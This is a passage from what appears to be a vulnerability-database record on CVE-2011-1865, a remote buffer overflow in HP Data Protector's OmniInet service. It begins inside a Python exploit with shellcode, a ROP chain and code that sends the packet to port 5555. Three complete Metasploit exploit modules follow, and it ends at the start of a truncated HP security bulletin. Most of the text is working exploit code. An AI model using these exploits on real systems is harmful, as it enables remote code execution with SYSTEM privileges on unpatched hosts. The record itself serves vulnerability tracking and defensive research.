xc3\"\r\n\"\\xb0\\x80\\x50\\x7f\\x69\\x17\\xec\\x69\\xad\\x18\\xed\\xbf\\x9e\\xb5\\x45\"\r\n\"\\x28\\x54\\xd6\\x51\\x49\\x6b\\xf3\\xf1\\x00\\x54\\x94\\x88\\x7c\\x17\\x04\"\r\n\"\\x8c\\x54\\xcf\\xa5\\x1f\\x33\\x0f\\xa3\\x03\\xec\\x58\\xe4\\xf2\\xe5\\x0c\"\r\n\"\\x18\\xac\\x5f\\x32\\xe1\\x28\\xa7\\xf6\\x3e\\x89\\x26\\xf7\\xb3\\xb5\\x0c\"\r\n\"\\xe7\\x0d\\x35\\x09\\x53\\xc2\\x60\\xc7\\x0d\\xa4\\xda\\xa9\\xe7\\x7e\\xb0\"\r\n\"\\x63\\x6f\\x06\\xfa\\xb3\\xe9\\x07\\xd7\\x45\\x15\\xb9\\x8e\\x13\\x2a\\x76\"\r\n\"\\x47\\x94\\x53\\x6a\\xf7\\x5b\\x8e\\x2e\\x07\\x16\\x92\\x07\\x80\\xff\\x47\"\r\n\"\\x1a\\xcd\\xff\\xb2\\x59\\xe8\\x83\\x36\\x22\\x0f\\x9b\\x33\\x27\\x4b\\x1b\"\r\n\"\\xa8\\x55\\xc4\\xce\\xce\\xca\\xe5\\xda\")\r\n\r\nwpm = \"\\x55\\x23\\xe4\\x77\" # 77E42355 WriteProcessMemory - Win2k3 \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Return after WPM \r\nwpm += \"\\xff\\xff\\xff\\xff\" # hProcess \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Address to Patch \r\nwpm += \"\\x41\\x41\\x41\\x41\" # lpBuffer placeholder (Shellcode Address) \r\nwpm += \"\\x42\\x42\\x42\\x42\" # nSize placeholder (Shellcode Size) 00001000\r\nwpm += \"\\x38\\xd4\\x4b\\x00\" # 004BD438 omniinet.exe - Pointer for Written Bytes \r\n\r\n# pre\r\npacket = (\"\\x00\\x00\\x27\\xCA\\xFF\\xFE\\x32\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\")\r\n\r\n# padding to EIP\r\npacket +=\"A\"* 2004\r\n# Get a copy of ESP into a register for safekeeping\r\npacket +=\"\\x1f\\x59\\x37\\x7c\" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # junk to pop into EBP\r\n\r\n# Jump over the WPM parameters\r\npacket += \"\\xfe\\x9b\\x35\\x7c\" # 0x7c359bfe : # ADD ESP,20 # RETN \r\npacket += wpm\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Get EAX to point at our shellcode on the stack and overwrite the placeholder\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN \r\npacket += \"\\x1c\\x3b\\x37\\x7c\" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\xd4\\x3d\\x43\\x00\" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Craft the shellcode size in EAX and overwrite the placeholder\r\npacket += \"\\x2e\\x40\\x34\\x7c\" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x59\\x3d\\x41\\x41\" # Value to SUB from EAX \r\npacket += \"\\x23\\x62\\x37\\x7c\" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x41\\x41\\x41\\x41\" # To be the sub-ee 41413D59\r\npacket += \"\\xe9\\xfa\\x36\\x7c\" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x69\\x60\\x37\\x7c\" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 12 # filler\r\n\r\n# Point ESP to WPM and the stack and return\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x05\\x8b\\x34\\x7c\" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]\r\npacket += \"\\x45\" * 8\r\npacket +=\"\\x90\" *120\r\npacket += shellcode\r\npacket +=\"C\"* 980000\r\n# post\r\npacket +=(\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\")\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\nsock.close()\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17468/"}, {"lastseen": "2016-02-02T07:58:21", "description": "HP OmniInet.exe Opcode 20 Buffer Overflow. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-04T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe Opcode 20 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "EDB-ID:17490", "href": "https://www.exploit-db.com/exploits/17490/", "sourceData": "##\r\n# $Id: hp_omniinet_4.rb 13096 2011-07-04 22:33:47Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\r\n\t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\r\n\t\t\t\ta buffer overflow can occur when this data is being written on the stack where\r\n\t\t\t\tno proper bounds checking is done beforehand, which results arbitrary code\r\n\t\t\t\texecution under the context of SYSTEM. This module is also made against systems\r\n\t\t\t\tsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\r\n\t\t\t\tenabled by default.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 13096 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Oren Isacson', #Initial discovery, poc\r\n\t\t\t\t\t'muts', #Initial poc of the ROP exploit w/ dookie\r\n\t\t\t\t\t'dookie', #Initial poc of the ROP exploit w/ muts\r\n\t\t\t\t\t'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\r\n\t\t\t\t\t'corelanc0d3r', #MSF module with sinn3r\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 2005, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jun 29 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"L\")[0].to_i\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t#mona.py tekniq\r\n\t\t#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\r\n\t\trop = [\r\n\t\t\t#Initial setup\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t#ROP begins here\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # Make EAX readable\r\n\t\t\t0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EBP\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # <- VirtualProtect() found in IAT\r\n\t\t\t0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0b, # Slide, so next gadget would write to correct stack location\r\n\t\t\t0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EDI (filler)\r\n\t\t\tnop, # will be patched at runtime (VP), then picked up into ESI\r\n\t\t\tnop, # EBX (filler)\r\n\t\t\t0x7c376402, # POP EBP # RETN (msvcr71.dll)\r\n\t\t\t0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0xfffff82f, # size 20001 bytes\r\n\t\t\t0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c354901, # POP EBX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffff, # pop value into ebx\r\n\t\t\t0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\r\n\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\r\n\t\t\t0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34b8d8, # ROP NOP (-> edi)\r\n\t\t\t0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffc0, # value to negate, target value : 0x00000040, target: edx\r\n\t\t\t0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x90909090, # NOPS (-> eax)\r\n\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\r\n\t\t].pack('V*')\r\n\r\n\t\t#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\r\n\t\t#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\r\n\t\tsploit = ''\r\n\t\tsploit << rand_text_alpha(target['Offset']-sploit.length)\r\n\t\tsploit << [target.ret].pack('V*')\r\n\t\tsploit << rop\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alpha(target['Max']-sploit.length)\r\n\r\n\t\tpkt = ''\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << \"\\x41\\x41\" #Length field place holder\r\n\t\tpkt << \"\\xff\\xfe\"\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x32\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpkt << Rex::Text.to_unicode(\"20\") #Opcode\r\n\t\tpkt << \"\\x00\"\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\\x00\")\r\n\t\tpkt << sploit\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\r\n\r\n\t\t#pkt length\r\n\t\tpkt[2,2] = [pkt.length-5].pack('n')\r\n\r\n\t\tprint_status(\"Sending packet to #{datastore['RHOST']}...\")\r\n\t\tsock.put(pkt)\r\n\r\n\t\t#Data Protector lags before triggering the vuln code\r\n\t\t#Long delay seems necessary to ensure we get a shell back\r\n\t\tselect(nil,nil,nil,20)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17490/"}], "metasploit": [{"lastseen": "2020-10-06T00:46:30", "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.\n", "published": "2011-07-04T17:02:40", "type": "metasploit", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Oren Isacson', #Initial discovery, poc\n 'muts', #Initial poc of the ROP exploit w/ dookie (WPM())\n 'dookie', #Initial poc of the ROP exploit w/ muts (WPM())\n 'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\n 'corelanc0d3r <peter.ve[at]corelan.be>', #MSF module with sinn3r, VP() ROP Chain\n ],\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'EDB', '17468' ],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\n [\n 'HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008',\n {\n 'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\n 'Ret' => 0x7C342629, #RETN - MSVCR71.dll\n 'Max' => 5000,\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 29 2011\",\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def nop\n return make_nops(4).unpack(\"L\")[0].to_i\n end\n\n def exploit\n\n connect\n\n #mona.py tekniq\n #https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\n rop = [\n #Initial setup - ROP Flight Landing Strip\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n #ROP begins here\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # Make EAX readable\n 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)\n nop, # EBP\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # <- VirtualProtect() found in IAT\n 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\n 0x7c346c0b, # Slide, so next gadget would write to correct stack location\n 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\n nop, # EDI (filler)\n nop, # will be patched at runtime (VP), then picked up into ESI\n nop, # EBX (filler)\n 0x7c376402, # POP EBP # RETN (msvcr71.dll)\n 0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0xfffff82f, # size 20001 bytes\n 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\n 0x7c354901, # POP EBX # RETN (MSVCR71.dll)\n 0xffffffff, # pop value into ebx\n 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\n 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\n 0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\n 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\n 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\n 0x7c34b8d8, # ROP NOP (-> edi)\n 0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\n 0xffffffc0, # value to negate, target value : 0x00000040, target: edx\n 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x90909090, # NOPS (-> eax)\n 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\n ].pack('V*')\n\n #Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\n #4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\n sploit = ''\n sploit << rand_text_alpha(target['Offset']-sploit.length)\n sploit << [target.ret].pack('V*')\n sploit << rop\n sploit << payload.encoded\n sploit << rand_text_alpha(target['Max']-sploit.length)\n\n pkt = ''\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << \"\\x41\\x41\" #Length field place holder\n pkt << \"\\xff\\xfe\"\n pkt << Rex::Text.to_unicode(\"\\x32\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\n pkt << Rex::Text.to_unicode(\"\\x20\")\n pkt << Rex::Text.to_unicode(\"20\") #Opcode\n pkt << \"\\x00\"\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\n pkt << Rex::Text.to_unicode(\"\\x20\\x00\")\n pkt << sploit\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\n\n #pkt length\n pkt[2,2] = [pkt.length-5].pack('n')\n\n print_status(\"Sending packet to #{datastore['RHOST']}...\")\n sock.put(pkt)\n\n #Data Protector lags before triggering the vuln code\n #Long delay seems necessary to ensure we get a shell back\n select(nil,nil,nil,20)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_4.rb"}, {"lastseen": "2020-08-27T01:01:45", "description": "This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code.\n", "published": "2011-07-01T17:07:38", "type": "metasploit", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\n {\n #POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\n 'Ret' => 0x7c35630d\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 29 2011'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n trigger = rand_text_alpha_upper(10000)\n trigger[4552, payload.encoded.length] = payload.encoded\n trigger[5352, 8] = generate_seh_record(target.ret)\n trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\n\n opcode = \"27\"\n\n packet = Rex::Text.to_unicode(\"\\x00\")\n packet << \"\\x27\\xca\" #length\n packet << \"\\xff\\xfe\\x32\"\n packet << \"\\x00\\x00\\x00\"\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\n packet << Rex::Text.to_unicode(\"\\x20\")\n packet << trigger\n packet << Rex::Text.to_unicode(\"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24\n\n print_status(\"Trying #{target.name}...\")\n sock.put(packet)\n\n select(nil,nil,nil,10)\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_3.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1865", "CVE-2011-1866"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02872182\r\nVersion: 3\r\n\r\nHPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-06-28\r\nLast Updated: 2011-06-29\r\n\r\n -------------------------------------------------------------------------------\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities has been identified with HP OpenView Storage Data\r\nProtector. These vulnerabilities could be remotely exploited to execute arbitrary code.\r\n\r\nReferences: CVE-2011-1865, CORE-2011-0514; CVE-2011-1866, CORE-2011-0606\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Storage Data Protector v6.20 running on Windows.\r\nHP OpenView Storage Data Protector v6.11 running on Windows.\r\nHP OpenView Storage Data Protector v6.10 running on Windows.\r\nHP OpenView Storage Data Protector v6.00 running on Windows.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-1865 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2011-1866 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Nahuel C. Riva and Oren Isacson at CORE-SECURITY.com for\r\nreporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following procedure to resolve these vulnerabilities.\r\n1. Upgrade to Data Protector A.06.20 or 